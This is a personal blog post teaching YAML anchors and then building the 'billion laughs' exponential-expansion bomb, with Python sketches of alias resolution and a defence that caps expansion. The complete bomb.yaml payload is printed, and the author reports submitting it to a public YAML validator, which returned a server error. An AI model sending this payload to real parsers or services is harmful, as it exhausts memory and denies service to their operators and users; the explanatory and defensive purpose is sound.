
Efrat

The billion laughs attack: YAML anchors explained

Disclaimer: this post is published for learning purposes. I do not encourage anyone to attack anything (and this attack probably won't work on any modern system anyway).

This post is for people who are already familiar with basic YAML but wish to know more. If you don't know YAML at all, I found a great intro for you. Come back when you are done.

YAML Anchors ⚓

YAML is a superset of JSON (officially since YAML 1.2), meaning you can convert JSON to YAML but not always vice versa. Over the years YAML has gained tons of features and rules that made it far more complicated than JSON. (That's both bad and good, I agree 😬)

One of YAML's cool features is anchors. An anchor is like a reference to another object in the file, so you don't have to repeat yourself. If you are familiar with pointers in any language, the idea is not new to you (yay 😁). Basically, you declare a variable, attach an anchor to its value (with & in front of the anchor name), and then refer to the anchor with * (YAML calls that reference an alias). The alias is interpreted as the anchored value itself. ☝️

Enough talking, time for an example:

# variable:       anchor           value
#   |               |               |
#   V               V               V
octopus: &anchor_to_the_octopus Aristotle

the_addams_family:
- Morticia
- Gomez
- Wednesday
- Pugsley
- *anchor_to_the_octopus

This mess will be interpreted as:

octopus: Aristotle
the_addams_family:
- Morticia
- Gomez
- Wednesday
- Pugsley
- Aristotle
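
To make the mechanics concrete, here is a toy model in Python of what a parser does with anchors and aliases. It is only a sketch: the `Alias` class, the `anchors` table and the `resolve` function are names made up for this illustration, not part of any real YAML library, and a real parser does this work while reading the file.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Alias:
    """Stands in for a YAML alias such as *anchor_to_the_octopus."""
    name: str


def resolve(node, anchors):
    """Return a copy of node with every Alias swapped for its anchored value."""
    if isinstance(node, Alias):
        return resolve(anchors[node.name], anchors)
    if isinstance(node, list):
        return [resolve(item, anchors) for item in node]
    if isinstance(node, dict):
        return {key: resolve(value, anchors) for key, value in node.items()}
    return node


# The anchor table: &anchor_to_the_octopus was attached to "Aristotle".
anchors = {"anchor_to_the_octopus": "Aristotle"}

document = {
    "octopus": "Aristotle",
    "the_addams_family": [
        "Morticia",
        "Gomez",
        "Wednesday",
        "Pugsley",
        Alias("anchor_to_the_octopus"),
    ],
}

resolved = resolve(document, anchors)
print(resolved["the_addams_family"][-1])  # prints: Aristotle
```

Every alias is looked up in the anchor table and replaced by the value it points to, which is exactly why the last family member above turns into the octopus.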

If this post goes well and I get tons of followers on Twitter, I'll do my best to write another one explaining how to merge YAML lists, so I get to add the rest of the Addams family up here. 💀 💀 💀 I swear.

So far so good. Now what are we building?

The Billion Laughs Bomb 💣 - Recursive Interpretation Attacks:

The idea is actually very old: earlier variations such as the ZIP bomb, the fork bomb, and the XML bomb have been around for years.

The common concept is to create a program or a file that, once interpreted by the machine, starts consuming an unexpected amount of memory (and causes a Denial of Service, if the year is 2002 or earlier).

"The billion laughs attack takes an exponential amount of space. The quadratic blowup variation causes quadratic growth in storage requirements by simply repeating a large entity over and over again, to avoid countermeasures that detect heavily nested entities."

(That's from Wikipedia. ;)

Let's build such a bomb file using the YAML anchors we just got introduced to. Don't freak out, please: the idea is exactly the same, it just looks trickier:

bomb.yaml

# lol-one is a single laugh:
lol1: &lol1 "lol"
# a var, an anchor, and a value, remember?

# lol-2 is an array of 10 lol-one's:
lol2: &lol2 [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1]
# a var, an anchor and a value.
# the value just happens to be an array of 10 aliases of lol1.
# that's completely legal in YAML.


# an array of 10 arrays of 10 laughs: (right, that's 100 laughs)
lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2]

# well, you got the idea:
lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3]
lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4]
lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5]
lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6]
lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7]
lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8]
lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]

Looking good: lol10 will actually be interpreted as 10^9 = 1,000,000,000 lols, and our billion laughs bomb is fully armed and ready for a test.
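
The arithmetic is easy to check. The Python sketch below assumes ten aliases per level, as the comments in bomb.yaml describe, and it only counts laughs instead of building them, so it is safe to run. `laughs_at_level` is a name I made up for this example.

```python
def laughs_at_level(level, fan_out=10):
    """Number of "lol" strings that lol<level> expands to.

    lol1 is a single laugh; every later level repeats the previous one
    fan_out times, so the count is multiplied by fan_out at each step.
    """
    return fan_out ** (level - 1)


for level in range(1, 11):
    print(f"lol{level}: {laughs_at_level(level):,} laughs")

# Rough size of the fully expanded text, at 3 bytes per "lol".
total = laughs_at_level(10)
print(f"{total * len('lol') / 10**9:.0f} GB of plain text")
```

That is roughly 3 GB of raw characters from a file of a few hundred bytes, before counting any per-object overhead the parser adds on top.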

I'm going to make my PoC using yamllint.com. It's a great place to validate your YAML files. Let's give it a dry run:

[Screenshot: dry-before]

And click the little Go button. Looks like that one was interpreted successfully:

[Screenshot: dry-after]

Now let's try the bomb:

[Screenshot: bomb-before]

And... (it takes a while): OUCH! (ha ha)

Now, of course, we didn't actually cause yamllint.com any damage, since the server is supposed to limit the memory consumed by my request. What happened here is that the server tried to parse the YAML for us but consumed too much memory, so the process got killed by the system and we got back the 500 error.

How do I defend my own system from this kind of nasty attack?

The obvious solution, of course, is to cap the amount of memory that the program may consume, so it won't eat up the entire RAM.
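
A memory cap is usually set at the operating system or container level. The same idea can also be applied inside the application, by giving the expansion a budget. The Python sketch below is my own illustration, not something yamllint.com or any particular YAML library is known to do: `Alias`, `ExpansionLimitExceeded`, `count_nodes`, `build_bomb` and the `max_nodes` parameter are all hypothetical names. It walks a toy version of the bomb without copying anything and gives up as soon as the expanded document would exceed the budget.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Alias:
    """Stands in for a YAML alias such as *lol1 (hypothetical helper)."""
    name: str


class ExpansionLimitExceeded(Exception):
    """Raised when a document would expand past the allowed node budget."""


def count_nodes(node, anchors, max_nodes):
    """Count the nodes of the fully expanded document, aborting past max_nodes."""
    seen = 0
    stack = [node]
    while stack:
        current = stack.pop()
        if isinstance(current, Alias):
            # Follow the alias to the value it points at; nothing is copied.
            stack.append(anchors[current.name])
            continue
        seen += 1
        if seen > max_nodes:
            raise ExpansionLimitExceeded(f"more than {max_nodes} nodes")
        if isinstance(current, list):
            stack.extend(current)
        elif isinstance(current, dict):
            stack.extend(current.values())
    return seen


def build_bomb(levels, fan_out=10):
    """Build a toy anchor table: lol1 is a string, the rest are lists of aliases."""
    anchors = {"lol1": "lol"}
    for level in range(2, levels + 1):
        anchors[f"lol{level}"] = [Alias(f"lol{level - 1}")] * fan_out
    return anchors


anchors = build_bomb(levels=10)

# A small document is counted in full: 1 list + 10 lists + 100 strings.
print(count_nodes(Alias("lol3"), anchors, max_nodes=100_000))  # prints: 111

# The full bomb is rejected once the budget is spent, long before a billion.
try:
    count_nodes(Alias("lol10"), anchors, max_nodes=100_000)
except ExpansionLimitExceeded as error:
    print("rejected:", error)
```

The check follows shared references instead of expanding them, so it needs almost no memory itself; only the budget decides how big a document is allowed to become.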

Recap:

So we know the bomb works; better not try it on your favourite machine. I suppose this post isn't an extremely useful one, but I hope you still enjoyed reading it.

Tweet me any time if you have any further questions: @EfratLevitan

Cheers!

Who am I?

My name's Efrat 👧, I will turn 21 this winter. I 💓 tech, Linux machines and cool coding languages. Currently I am a DevOps at a company called Yad2. Most of my time I work with 🐳 & Kubernetes on the AWS cloud. Follow me ✋
